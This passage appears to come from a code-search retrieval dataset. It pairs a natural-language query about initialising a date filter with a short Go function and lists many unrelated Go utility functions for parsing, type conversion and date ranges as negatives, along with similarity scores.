{\n\t\ttypeBuf.WriteString(n.TypeIdent().Pascal())\n\t\treturn typeBuf.String()\n\t}\n\n\t// Special cases denoted by the ECS developers.\n\tswitch {\n\tcase n.Name == \"duration\" && n.Definition.Type == \"long\":\n\t\ttypeBuf.WriteString(\"time.Duration\")\n\t\treturn typeBuf.String()\n\tcase n.Name == \"args\" && n.Definition.Type == \"keyword\":\n\t\ttypeBuf.WriteString(\"[]string\")\n\t\treturn typeBuf.String()\n\tcase n.Path == \"labels\":\n\t\ttypeBuf.WriteString(\"map[string]interface{}\")\n\t\treturn typeBuf.String()\n\t}\n\n\t// Find the right type!\n\tswitch n.Definition.Type {\n\tcase \"keyword\", \"text\", \"ip\", \"geo_point\":\n\t\ttypeBuf.WriteString(\"string\")\n\t\treturn typeBuf.String()\n\tcase \"long\":\n\t\ttypeBuf.WriteString(\"int64\")\n\t\treturn typeBuf.String()\n\tcase \"integer\":\n\t\ttypeBuf.WriteString(\"int32\")\n\t\treturn typeBuf.String()\n\tcase \"float\":\n\t\ttypeBuf.WriteString(\"float64\")\n\t\treturn typeBuf.String()\n\tcase \"date\":\n\t\ttypeBuf.WriteString(\"time.Time\")\n\t\treturn typeBuf.String()\n\tcase \"boolean\":\n\t\ttypeBuf.WriteString(\"bool\")\n\t\treturn typeBuf.String()\n\tcase \"object\":\n\t\ttypeBuf.WriteString(\"map[string]interface{}\")\n\t\treturn typeBuf.String()\n\tdefault:\n\t\tpanic(fmt.Errorf(\"no translation for %v (field %s)\", n.Definition.Type, n.Name))\n\t}\n}", "func DefaultUnitType(name string) string {\n\treturn fmt.Sprintf(\"%s.service\", name)\n}", "func ParseString(str string, algorithm geo.Algorithm) (*geo.GPX, error) {\n\treturn gxml.ParseBytes([]byte(str), algorithm)\n}", "func Must(grammarString string) (*grammar.Grammar, tree.Reducer) {\n\tg, r, err := New(grammarString)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn g, r\n}", "func parseGCV(val string) string {\r\n\tif val == \"\" || val == \" \" {\r\n\t\treturn val\r\n\t}\r\n\tvar nval []string\r\n\tsval := strings.Split(val, \"\")\r\n\tfor _, s := range sval {\r\n\t\tif s == \" \" || s == \"0\" {\r\n\t\t\tcontinue\r\n\t\t}\r\n\t\tnval = append(nval, s)\r\n\t}\r\n\treturn strings.Join(nval, \"\")\r\n}", "func LoadString(s string) (*types.TypeRegistry, *types.Scope, error) {\n\tTR = types.NewTypeRegistry()\n\tGlobalScope = types.NewScope()\n\n\t_, err := Parse(\"string\", []byte(s))\n\treturn TR, GlobalScope, err\n}", "func ToGoTypeName(value string) (string, classes.Usage) {\n\tif ret, ok := cgoBuiltInTypeMap[value]; ok {\n\t\treturn ret, classes.USAGE_GO_PRIMATIVE\n\t}\n\n\tgoTypeName := ToPascalCase(stripGodotPrefix(value))\n\n\tt, u := classes.GoTypeAndUsage(goTypeName)\n\n\tswitch u {\n\tcase classes.USAGE_GODOT_STRING:\n\t\treturn \"String\", u\n\tcase classes.USAGE_GODOT_STRING_NAME:\n\t\treturn \"StringName\", u\n\t}\n\n\treturn t, u\n}", "func AutotypeValue(input interface{}) interface{} {\n\tif strValue, ok := input.(string); ok {\n\t\tif intVal, err := strconv.ParseInt(strValue, 10, 64); err == nil {\n\t\t\treturn intVal\n\t\t} else if floatVal, err := strconv.ParseFloat(strValue, 64); err == nil {\n\t\t\treturn floatVal\n\t\t} else if strValue == \"true\" {\n\t\t\treturn true\n\t\t} else if strValue == \"false\" {\n\t\t\treturn false\n\t\t} else if strValue == \"null\" {\n\t\t\treturn nil\n\t\t}\n\t}\n\n\treturn input\n}", "func (c *bls12381MapG1) RequiredGas(input []byte) uint64 {\n\treturn params.Bls12381MapG1Gas\n}", "func (t *VTStrStr) GoType() string {\n\treturn \"VTStrStr\"\n}", "func (t *VMStrTPStrStr) GoType() string {\n\treturn \"VMStrTPStrStr\"\n}", "func generalizeType(t1, t2 string) (string, bool) {\n\tif t1 == t2 {\n\t\treturn t1, true\n\t}\n\n\tif t1 == \"\" {\n\t\treturn t2, true\n\t}\n\n\tif t2 == \"\" {\n\t\treturn t1, true\n\t}\n\n\tswitch t1 {\n\tcase indexer.IntegerType:\n\t\tif t2 == indexer.FloatType {\n\t\t\treturn indexer.FloatType, true\n\t\t}\n\n\tcase indexer.FloatType:\n\t\tif t2 == indexer.IntegerType {\n\t\t\treturn indexer.FloatType, true\n\t\t}\n\n\tcase indexer.TextType:\n\t\tswitch t2 {\n\t\tcase indexer.StringType, indexer.DateType:\n\t\t\treturn indexer.TextType, true\n\t\t}\n\n\tcase indexer.StringType:\n\t\tswitch t2 {\n\t\tcase indexer.TextType, indexer.DateType:\n\t\t\treturn indexer.TextType, true\n\t\t}\n\n\tcase indexer.DateType:\n\t\tswitch t2 {\n\t\tcase indexer.StringType:\n\t\t\treturn indexer.StringType, true\n\t\tcase indexer.TextType:\n\t\t\treturn indexer.TextType, true\n\t\t}\n\t}\n\n\treturn \"\", false\n}", "func toBoundary(s string) (BoundaryValue, error) {\n\tvar (\n\t\terr error\n\t\tbv BoundaryValue\n\t)\n\tflag, sK, eK, pK := true, \"start:\", \"end:\", \",\"\n\tf := func(ss, p string) bool { return strings.Contains(ss, p) }\n\n\t// triage function\n\ttrait := func(ts0, ts1, sk, ek string) (bv BoundaryValue, err error) {\n\t\tts0, ts1 = strings.Replace(ts0, sk, \"\", 1), strings.Replace(ts1, ek, \"\", 1)\n\t\tif bv.Start, err = toUint32(ts0); err != nil {\n\t\t\treturn bv, err\n\t\t}\n\t\tbv.End, err = toUint32(ts1)\n\t\treturn bv, err\n\t}\n\n\tswitch flag {\n\tcase f(s, pK) && f(s, sK) && f(s, eK): // e.g. \"start:10,end:15\" or \"end:15,start:10\"\n\t\tts := strings.Split(s, pK)\n\t\tif ts0, ts1 := ts[0], ts[1]; f(ts0, sK) && f(ts1, eK) { // ts0=\"start:10\" and ts1=\"end:15\"\n\t\t\treturn trait(ts0, ts1, sK, eK)\n\t\t} else if ts0, ts1 := ts[0], ts[1]; f(ts0, eK) && f(ts1, sK) { // ts0=\"end:15\" and ts1=\"start:10\"\n\t\t\treturn trait(ts1, ts0, sK, eK)\n\t\t} else {\n\t\t\treturn bv, fmt.Errorf(\"unsupported format %s\", s)\n\t\t}\n\tcase f(s, pK) && !f(s, sK) && !f(s, eK): // e.g. \"10,15\"\n\t\tts := strings.Split(s, pK)\n\t\treturn trait(ts[0], ts[1], \"\", \"\")\n\tcase (f(s, sK) || (f(s, pK) && f(s, sK))) && !f(s, eK): // e.g. \"start:10\" or \"start:10,\"\n\t\tts := strings.Replace(s, sK, \"\", 1)\n\t\tts = strings.Replace(ts, pK, \"\", 1)\n\t\tbv.End = math.MaxUint32\n\t\tbv.Start, err = toUint32(ts)\n\t\treturn bv, err\n\tcase (f(s, eK) || (f(s, pK) && f(s, eK))) && !f(s, sK): // e.g. \"end:15\" or \"end:15,\"\n\t\tts := strings.Replace(s, eK, \"\", 1)\n\t\tts = strings.Replace(ts, pK, \"\", 1)\n\t\tbv.End, err = toUint32(ts)\n\t\treturn bv, err\n\tdefault: // e.g. \"10\"\n\t\tbv.Start, err = toUint32(s)\n\t\tbv.End = math.MaxUint32\n\t\treturn bv, err\n\t}\n}", "func GeoShapeFromString(str string) (GeoShapeGo, error) {\n\tcharsToTrim := \"polygon() \"\n\tpolygonStrs := regexp.MustCompile(`\\),\\s*\\(`).Split(strings.TrimFunc(strings.ToLower(str), func(r rune) bool {\n\t\treturn strings.IndexRune(charsToTrim, r) >= 0\n\t}), -1)\n\n\tshape := GeoShapeGo{}\n\tshape.Polygons = make([][]GeoPointGo, 0, len(polygonStrs))\n\tfor _, polygonStr := range polygonStrs {\n\t\tlngLatPairs := strings.Split(polygonStr, \",\")\n\t\tpolygon := make([]GeoPointGo, 0, len(lngLatPairs))\n\t\tfor _, lngLatPair := range lngLatPairs {\n\t\t\tlngLat := strings.Fields(lngLatPair)\n\t\t\tif len(lngLat) != 2 {\n\t\t\t\treturn GeoShapeGo{}, utils.StackError(nil, \"invalid point format %s\", lngLatPair)\n\t\t\t}\n\t\t\tlng, err := strconv.ParseFloat(lngLat[0], 32)\n\t\t\tif err != nil || lng < -180 || lng > 180 {\n\t\t\t\treturn GeoShapeGo{}, utils.StackError(err, \"invalid longitude, expect float number in [-180, 180], got %s\", lngLat[0])\n\t\t\t}\n\t\t\tlat, err := strconv.ParseFloat(lngLat[1], 32)\n\t\t\tif err != nil || lat < -90 || lat > 90 {\n\t\t\t\treturn GeoShapeGo{}, utils.StackError(err, \"invalid latitude, expect float number in [-90, 90], got %s\", lngLat[1])\n\t\t\t}\n\t\t\tpoint := GeoPointGo{float32(lat), float32(lng)}\n\t\t\tpolygon = append(polygon, point)\n\t\t}\n\t\tshape.Polygons = append(shape.Polygons, polygon)\n\t}\n\treturn shape, nil\n}", "func (me TxsdMovementType) IsGc() bool { return me.String() == \"GC\" }", "func (String) IsGround() bool {\n\treturn true\n}", "func mustParseTimeQuantum(v string) TimeQuantum {\n\tq, err := parseTimeQuantum(v)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn q\n}", "func AnimalFromString(str string) Animal {\n\tswitch str {\n\tcase animalStringZebra:\n\t\treturn AnimalZebra\n\tcase animalStringGiraffe:\n\t\treturn AnimalGiraffe\n\tcase animalStringCoyote:\n\t\treturn AnimalCoyote\n\tdefault:\n\t\treturn AnimalUnknown\n\t}\n}", "func parse(s string, unit map[string]float64) (int64, error) {\n\tvar size int64\n\tvar ok bool\n\tfor {\n\t\ts = strings.TrimSpace(s)\n\t\tm := sizeRE.FindStringSubmatch(s)\n\t\tif m == nil {\n\t\t\tbreak\n\t\t}\n\t\tv, err := strconv.ParseFloat(m[1], 64)\n\t\tif err != nil {\n\t\t\treturn 0, fmt.Errorf(\"sizeflag: invalid size %q\", m[0])\n\t\t\t// Should not be structurally possible, though.\n\t\t}\n\t\tif mul, ok := unit[strings.ToLower(m[2])]; ok {\n\t\t\tv *= mul\n\t\t} else {\n\t\t\treturn size, fmt.Errorf(\"sizeflag: invalid unit %q\", m[2])\n\t\t}\n\t\tsize += int64(v)\n\t\ts = s[len(m[0]):]\n\t\tok = true\n\t}\n\tif s = strings.TrimSpace(s); s != \"\" {\n\t\tv, err := strconv.ParseInt(s, 10, 64)\n\t\tif err != nil {\n\t\t\treturn 0, fmt.Errorf(\"sizeflag: invalid size %q\", s)\n\t\t}\n\t\tsize += v\n\t} else if !ok {\n\t\treturn 0, fmt.Errorf(\"sizeflag: invalid size %q\", s)\n\t}\n\treturn size, nil\n}", "func StringValue(s string) Value { return Value{Typ: '$', Str: []byte(s)} }", "func StringToDataType(s string) (DataType, error) {\n\tswitch s {\n\tcase \"DSA\":\n\t\treturn DSA, nil\n\tcase \"DFA\":\n\t\treturn DFA, nil\n\tcase \"DDA\":\n\t\treturn DDA, nil\n\tcase \"DSB\":\n\t\treturn DSB, nil\n\tcase \"DFB\":\n\t\treturn DFB, nil\n\tcase \"DDB\":\n\t\treturn DDB, nil\n\tdefault:\n\t\treturn 0, ErrUnknownDataType\n\t}\n}", "func (i *Type) UnmarshalGQL(value interface{}) error {\n\tstr, ok := value.(string)\n\tif !ok {\n\t\treturn fmt.Errorf(\"Type should be a string, got %T\", value)\n\t}\n\n\tvar err error\n\t*i, err = TypeString(str)\n\treturn err\n}", "func (me TFontFamilyValueType) String() string { return xsdt.String(me).String() }", "func SyncTypeParse(v string) (SyncType, error) {\n\tif strings.EqualFold(v, string(SyncTypeIFrame)) {\n\t\treturn SyncTypeIFrame, nil\n\t}\n\n\tif strings.EqualFold(v, string(SyncTypeRedirect)) {\n\t\treturn SyncTypeRedirect, nil\n\t}\n\n\treturn SyncTypeUnknown, fmt.Errorf(\"invalid sync type `%s`\", v)\n}", "func (o *Cvtermsynonym) TypeG(mods ...qm.QueryMod) cvtermQuery {\n\treturn o.Type(boil.GetDB(), mods...)\n}", "func parseBaseType(node *node32) (Type, error) {\n\tswitch node.pegRule {\n\tcase ruleINT:\n\t\treturn IntType{}, nil\n\tcase ruleBOOL:\n\t\treturn BoolType{}, nil\n\tcase ruleCHAR:\n\t\treturn CharType{}, nil\n\tcase ruleSTRING:\n\t\treturn ArrayType{base: CharType{}}, nil\n\tcase ruleVOID:\n\t\treturn VoidType{}, nil\n\tcase ruleCLASSTYPE:\n\t\treturn &ClassType{name: node.up.match}, nil\n\tcase ruleENUMTYPE:\n\t\treturn &EnumType{ident: node.up.next.match}, nil\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"Unknown type: %s\", node.up.match)\n\t}\n}", "func FromCodon(input string) (string, error) {\n if input == \"UAA\" || input == \"UAG\" || input == \"UGA\" {\n return \"\", STOP\n }\n if _, ok := codons[input]; ok != true {\n return \"\", ErrInvalidBase\n }\n return codons[input], nil\n}" ]
[ "0.5375152", "0.53319323", "0.518015", "0.5162776", "0.51477826", "0.50997907", "0.50446767", "0.49252293", "0.4923826", "0.49124753", "0.4878213", "0.487216", "0.48520857", "0.48334092", "0.47779343", "0.47779343", "0.47713298", "0.4755434", "0.47027177", "0.4701107", "0.46960124", "0.46709839", "0.46305326", "0.45946395", "0.4583976", "0.45795268", "0.45785674", "0.45778954", "0.45746836", "0.45471445", "0.45451662", "0.45449045", "0.45365113", "0.45340538", "0.45288563", "0.45288563", "0.4522384", "0.45024142", "0.44954208", "0.44895536", "0.44827792", "0.44800347", "0.44659647", "0.44550005", "0.4439521", "0.44372177", "0.44280845", "0.4408836", "0.44049153", "0.4398793", "0.43964142", "0.4391645", "0.43899962", "0.43898323", "0.4377778", "0.4374698", "0.43732375", "0.43679568", "0.43665966", "0.43628946", "0.43598938", "0.4352128", "0.43456817", "0.43432277", "0.43415323", "0.43300313", "0.4326642", "0.43215194", "0.43004695", "0.4298222", "0.4298076", "0.42946362", "0.42931744", "0.42805004", "0.42799425", "0.42789292", "0.4265511", "0.42650607", "0.4246335", "0.42460695", "0.42408133", "0.4239186", "0.42273676", "0.42148557", "0.42145714", "0.42142382", "0.42124066", "0.4209468", "0.42033046", "0.42027158", "0.420156", "0.4199379", "0.41960937", "0.4192574", "0.41886318", "0.41853338", "0.4184771", "0.4183371", "0.41815135", "0.41783452" ]
0.80514586
0
initialize the tasks.DateFiltering to get StartDate and endDate
func newFilter() *tasks.DateFiltering { return &tasks.DateFiltering{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func StartDateIn(vs ...time.Time) predicate.FlowInstance {\n\tv := make([]interface{}, len(vs))\n\tfor i := range v {\n\t\tv[i] = vs[i]\n\t}\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\t// if not arguments were provided, append the FALSE constants,\n\t\t// since we can't apply \"IN ()\". This will make this predicate falsy.\n\t\tif len(v) == 0 {\n\t\t\ts.Where(sql.False())\n\t\t\treturn\n\t\t}\n\t\ts.Where(sql.In(s.C(FieldStartDate), v...))\n\t})\n}", "func StartDate(v time.Time) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.EQ(s.C(FieldStartDate), v))\n\t})\n}", "func (_Crowdsale *CrowdsaleFilterer) FilterStartDateUpdated(opts *bind.FilterOpts) (*CrowdsaleStartDateUpdatedIterator, error) {\n\n\tlogs, sub, err := _Crowdsale.contract.FilterLogs(opts, \"StartDateUpdated\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &CrowdsaleStartDateUpdatedIterator{contract: _Crowdsale.contract, event: \"StartDateUpdated\", logs: logs, sub: sub}, nil\n}", "func StartDateNotIn(vs ...time.Time) predicate.FlowInstance {\n\tv := make([]interface{}, len(vs))\n\tfor i := range v {\n\t\tv[i] = vs[i]\n\t}\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\t// if not arguments were provided, append the FALSE constants,\n\t\t// since we can't apply \"IN ()\". This will make this predicate falsy.\n\t\tif len(v) == 0 {\n\t\t\ts.Where(sql.False())\n\t\t\treturn\n\t\t}\n\t\ts.Where(sql.NotIn(s.C(FieldStartDate), v...))\n\t})\n}", "func (handler *Handlers)GetTasks(w http.ResponseWriter,req *http.Request) {\n log.Println(\"getting task list of current user from startDate to endDate\")\n w.Header().Set(\"Content-Type\", \"application/json\")\n username := token.GetUserName(w, req)\n\n filter := newFilter() //initialize dateFilter\n err := json.NewDecoder(req.Body).Decode(&filter) //parse startDate and endDate from response body\n if err != nil {\n fmt.Fprintln(w, err.Error())\n return\n }\n\n startDate, endDate, dateError := validation.ValidateDate(filter.StartDate, filter.EndDate) //validate Date\n if dateError != nil {\n fmt.Fprintln(w, dateError)\n return\n }\n\n //get all tasks from database of current user from startDate to endDate\n taskList, err := handler.Repository.GetTasks(username, startDate, endDate)\n if err != nil {\n fmt.Fprintln(w, err)\n return\n }\n if taskList == nil {\n fmt.Fprintln(w, \"No tasks assigned\")\n return\n }\n err = json.NewEncoder(w).Encode(taskList) //display task\n if err == nil {\n log.Println(\"task displayed\")\n }\n}", "func (m *RecurrenceRange) SetStartDate(value *i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.DateOnly)() {\n err := m.GetBackingStore().Set(\"startDate\", value)\n if err != nil {\n panic(err)\n }\n}", "func (app *Application) extractDateRangeParams(r *http.Request) (query.DateRangeParams, error) {\n\n\tvar params query.DateRangeParams\n\n\t// required param: mode\n\tmode := r.URL.Query().Get(\"mode\")\n\tif mode == \"\" {\n\t\tmode = \"month\"\n\t}\n\tparams.Mode = mode\n\n\t// required param: offset\n\toffStr := r.URL.Query().Get(\"offset\")\n\tif offStr == \"\" {\n\t\toffStr = \"0\"\n\t}\n\toffset, err := strconv.Atoi(offStr)\n\tif err != nil {\n\t\treturn params, errors.New(\"invalid format for parameter: offset\")\n\t}\n\tparams.Offset = offset\n\n\t// optional param: tz\n\t// if unset, try the value in the session\n\t// otherwise default to UTC\n\ttzStr := r.URL.Query().Get(\"tz\")\n\tif tzStr == \"\" {\n\t\ttzStr = app.session.GetString(r, \"timezone\")\n\t}\n\tif tzStr != \"\" {\n\t\tloc, err := time.LoadLocation(tzStr)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Error loading timezone:%s %v\", tzStr, err)\n\t\t} else {\n\t\t\tparams.TZ = loc\n\t\t}\n\t}\n\tif params.TZ == nil {\n\t\tparams.TZ = time.UTC\n\t}\n\n\t// optional param: count\n\t// XXX client never actually changes the value\n\t// countStr := r.URL.Query().Get(\"count\")\n\tparams.Limit = 20\n\n\t// compute start/end dates from mode & offset\n\t// XXX refactor this to be unit-testable and not depend on Now()\n\tnow := time.Now()\n\n\tif mode == \"week\" {\n\t\t// show week ending today / last 7 days\n\t\ttmp := time.Date(now.Year(), now.Month(), now.Day(), 0, 0, 0, 0, params.TZ)\n\t\tparams.End = tmp.AddDate(0, 0, -offset*7)\n\t\tparams.Start = params.End.AddDate(0, 0, -7)\n\t} else if mode == \"month\" {\n\t\t// show month to date (inconsistent with week)\n\t\ttmp := time.Date(now.Year(), now.Month(), 1, 0, 0, 0, 0, params.TZ)\n\t\tparams.Start = tmp.AddDate(0, -offset, 0)\n\t\tparams.End = params.Start.AddDate(0, 1, 0)\n\t} else if mode == \"year\" {\n\t\ty := now.Year()\n\t\ty -= offset\n\t\tparams.Start = time.Date(y, time.January, 1, 0, 0, 0, 0, params.TZ)\n\t\tparams.End = params.Start.AddDate(1, 0, 0)\n\t} else {\n\t\treturn params, errors.New(\"invalid value for parameter: mode\")\n\t}\n\n\tfmt.Printf(\"{%s %s %d}\\n\", params.StartString(), params.EndString(), params.Limit)\n\treturn params, nil\n}", "func (op *InvoicesListOp) FromDate(val time.Time) *InvoicesListOp {\n\tif op != nil {\n\t\top.QueryOpts.Set(\"from_date\", val.Format(time.RFC3339))\n\t}\n\treturn op\n}", "func OptionStartDate(when time.Time) QOption {\n\treturn func(q *Q) {\n\t\tq.query.Set(\"start_date\", when.Format(layout))\n\t}\n}", "func (_Crowdsale *CrowdsaleTransactor) SetStartDate(opts *bind.TransactOpts, _startDate *big.Int) (*types.Transaction, error) {\n\treturn _Crowdsale.contract.Transact(opts, \"setStartDate\", _startDate)\n}", "func ArgumentStandardDateRestrictions(set *flag.FlagSet) {\n\tdateFormat := dates.DateFormat()\n\tnow := dates.StartOfDay(time.Now())\n\tyesterday := dates.StartOfDay(time.Now().AddDate(0, 0, -1))\n\n\tset.String(\"start-date\", yesterday.Format(dateFormat), \"Start date following \"+dateFormat+\" format, defaults to yesterday at midnight\")\n\tset.String(\"end-date\", now.Format(dateFormat), \"End date following \"+dateFormat+\" format, defaults to today at midnight\")\n}", "func (c *PostsListCall) StartDate(startDate string) *PostsListCall {\n\tc.urlParams_.Set(\"startDate\", startDate)\n\treturn c\n}", "func (o *GetBeneficiariesParams) bindStartDate(rawData []string, hasKey bool, formats strfmt.Registry) error {\n\tif !hasKey {\n\t\treturn errors.Required(\"startDate\", \"query\", rawData)\n\t}\n\tvar raw string\n\tif len(rawData) > 0 {\n\t\traw = rawData[len(rawData)-1]\n\t}\n\n\t// Required: true\n\t// AllowEmptyValue: false\n\tif err := validate.RequiredString(\"startDate\", \"query\", raw); err != nil {\n\t\treturn err\n\t}\n\n\t// Format: date\n\tvalue, err := formats.Parse(\"date\", raw)\n\tif err != nil {\n\t\treturn errors.InvalidType(\"startDate\", \"query\", \"strfmt.Date\", raw)\n\t}\n\to.StartDate = *(value.(*strfmt.Date))\n\n\tif err := o.validateStartDate(formats); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func ParseDateRange(vars map[string]string) (startDate time.Time, endDate time.Time, err error) {\n\tstartDate, err = ParseISODate(vars[\"startDate\"])\n\tif err != nil {\n\t\terr = errors.New(\"please use a valid start date with a format of YYYY-MM-DD\")\n\t\treturn\n\t}\n\n\tendDate, err = ParseISODate(vars[\"endDate\"])\n\tif err != nil {\n\t\terr = errors.New(\"please use a valid end date with a format of YYYY-MM-DD\")\n\t\treturn\n\t}\n\n\treturn\n}", "func generateTimeFilterStage(rangeInitDays, rangeEndDays int) []bson.M {\n\treturn []bson.M{\n\t\tbson.M{\n\t\t\t\"$match\": bson.M{\n\t\t\t\t\"finishedAt\": bson.M{\n\t\t\t\t\t\"$gte\": util.BeginningOfTheDay(time.Now().AddDate(0, 0, rangeInitDays)),\n\t\t\t\t\t\"$lte\": util.EndOfTheDay(time.Now().AddDate(0, 0, rangeEndDays)),\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func (ms *MySQLStore) GetAllBetweenDates(userID int64, beginDate string, endDate string) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt between ? and ?\"\n\trows, err := ms.Client.Query(query, userID, beginDate, endDate)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func (filter TaskReliabilityFilter) dateBoundaries() []time.Time {\n\tstart := filter.AfterDate\n\tend := filter.BeforeDate\n\tnumDays := filter.GroupNumDays\n\n\tif numDays <= 0 {\n\t\tnumDays = 1\n\t}\n\n\tstart = utility.GetUTCDay(start)\n\tend = utility.GetUTCDay(end)\n\n\tboundaries := []time.Time{}\n\tduration := 24 * time.Hour * time.Duration(numDays)\n\tduration = -1 * duration\n\tboundary := end.Add(24 * time.Hour)\n\n\tfor boundary.After(start) {\n\t\tboundaries = append(boundaries, boundary)\n\t\tboundary = boundary.Add(duration)\n\t}\n\tboundaries = append(boundaries, boundary)\n\treturn boundaries\n}", "func (r ApiGetEffortsBySegmentIdRequest) StartDateLocal(startDateLocal time.Time) ApiGetEffortsBySegmentIdRequest {\n\tr.startDateLocal = &startDateLocal\n\treturn r\n}", "func StartTimeFilter(startTime time.Time) Filter {\n\treturn Param(\"start\", strconv.Itoa(int(startTime.Unix())))\n}", "func StartDateGTE(v time.Time) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.GTE(s.C(FieldStartDate), v))\n\t})\n}", "func StartDate(val string) Argument {\n\treturn func(request *requests.Request) error {\n\t\terr := assertDateFormatV1(val, \"StartDate\")\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\trequest.AddArgument(\"start_date\", val)\n\t\treturn nil\n\t}\n}", "func (sfr *stateFilterRunner) Init(\n\tcriteria criterias.Criteriable,\n\tconnection *golastic.Connection,\n\tinfo ...infos.Informable,\n) (Runnerable, error) {\n\tif err := sfr.BaseInit(criteria, connection, info...); err != nil {\n\t\treturn nil, err\n\t}\n\n\tsfr.criteria = criteria.(*criterias.State)\n\n\treturn sfr, nil\n}", "func StartDateLTE(v time.Time) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.LTE(s.C(FieldStartDate), v))\n\t})\n}", "func (c *CommentsListCall) StartDate(startDate string) *CommentsListCall {\n\tc.urlParams_.Set(\"startDate\", startDate)\n\treturn c\n}", "func generateDateRange(datetimeStart, datetimeEnd string, timeRange int) (map[string]interface{}, error) {\n\tt1, err := time.Parse(\"2006-01-02 15:04\", datetimeStart)\n\tif err != nil {\n\n\t\treturn nil, err\n\t}\n\tt2, err := time.Parse(\"2006-01-02 15:04\", datetimeEnd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif float64(t1.Minute())/float64(timeRange) != 0 {\n\t\tiMin := t1.Minute() / timeRange\n\t\tfMin := float64(t1.Minute()) / float64(timeRange)\n\t\ttMin := fMin - float64(iMin)\n\t\tmin := timeRange - int(tMin)\n\t\tt1 = t1.Add(time.Duration(min) * time.Minute)\n\t}\n\tdata := make(map[string]interface{}, 0)\n\tfor t1.Before(t2) {\n\t\tdata[t1.Format(\"2006-01-02 15:04\")] = nil\n\t\tt1 = t1.Add(time.Duration(timeRange) * time.Minute)\n\t}\n\treturn data, nil\n}", "func (filter TaskReliabilityFilter) buildTaskPaginationOrBranches() []bson.M {\n\tvar dateDescending = filter.Sort == taskstats.SortLatestFirst\n\tvar nextDate interface{}\n\n\tif filter.GroupNumDays > 1 {\n\t\tnextDate = filter.StartAt.Date\n\t}\n\n\tvar fields []taskstats.PaginationField\n\n\tswitch filter.GroupBy {\n\tcase taskstats.GroupByTask:\n\t\tfields = []taskstats.PaginationField{\n\t\t\t{Field: taskstats.DBTaskStatsIDDateKeyFull, Descending: dateDescending, Strict: true, Value: filter.StartAt.Date, NextValue: nextDate},\n\t\t\t{Field: taskstats.DBTaskStatsIDTaskNameKeyFull, Strict: true, Value: filter.StartAt.Task},\n\t\t}\n\tcase taskstats.GroupByVariant:\n\t\tfields = []taskstats.PaginationField{\n\t\t\t{Field: taskstats.DBTaskStatsIDDateKeyFull, Descending: dateDescending, Strict: true, Value: filter.StartAt.Date, NextValue: nextDate},\n\t\t\t{Field: taskstats.DBTaskStatsIDBuildVariantKeyFull, Strict: true, Value: filter.StartAt.BuildVariant},\n\t\t\t{Field: taskstats.DBTaskStatsIDTaskNameKeyFull, Strict: true, Value: filter.StartAt.Task},\n\t\t}\n\tcase taskstats.GroupByDistro:\n\t\tfields = []taskstats.PaginationField{\n\t\t\t{Field: taskstats.DBTaskStatsIDDateKeyFull, Descending: dateDescending, Strict: true, Value: filter.StartAt.Date, NextValue: nextDate},\n\t\t\t{Field: taskstats.DBTaskStatsIDBuildVariantKeyFull, Strict: true, Value: filter.StartAt.BuildVariant},\n\t\t\t{Field: taskstats.DBTaskStatsIDTaskNameKeyFull, Strict: true, Value: filter.StartAt.Task},\n\t\t\t{Field: taskstats.DBTaskStatsIDDistroKeyFull, Strict: true, Value: filter.StartAt.Distro},\n\t\t}\n\t}\n\n\treturn taskstats.BuildPaginationOrBranches(fields)\n}", "func (_Crowdsale *CrowdsaleFilterer) FilterEndDateUpdated(opts *bind.FilterOpts) (*CrowdsaleEndDateUpdatedIterator, error) {\n\n\tlogs, sub, err := _Crowdsale.contract.FilterLogs(opts, \"EndDateUpdated\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &CrowdsaleEndDateUpdatedIterator{contract: _Crowdsale.contract, event: \"EndDateUpdated\", logs: logs, sub: sub}, nil\n}", "func ValidateDates(pStartDate, pEndDate *string, pIsCreate bool) (bool, string) {\n\tvar message string\n\n\tif pStartDate == nil {\n\t\tstartDateTmp := \"\"\n\t\tpStartDate = &startDateTmp\n\t}\n\tif pEndDate == nil {\n\t\tendDateTmp := \"\"\n\t\tpEndDate = &endDateTmp\n\t}\n\n\tif pIsCreate {\n\t\tif *pStartDate == \"\" && *pEndDate == \"\" {\n\t\t\t*pStartDate = time.Now().Format(\"2006-01-02\")\n\t\t\t*pEndDate = time.Now().AddDate(0, 1, 0).Format(\"2006-01-02\")\n\t\t} else if *pStartDate != \"\" && *pEndDate == \"\" {\n\t\t\tstartDate, err := time.Parse(\"2006-01-02\", *pStartDate)\n\t\t\tif err == nil {\n\t\t\t\t*pEndDate = startDate.AddDate(0, 1, 0).Format(\"2006-01-02\")\n\t\t\t}\n\t\t} else if 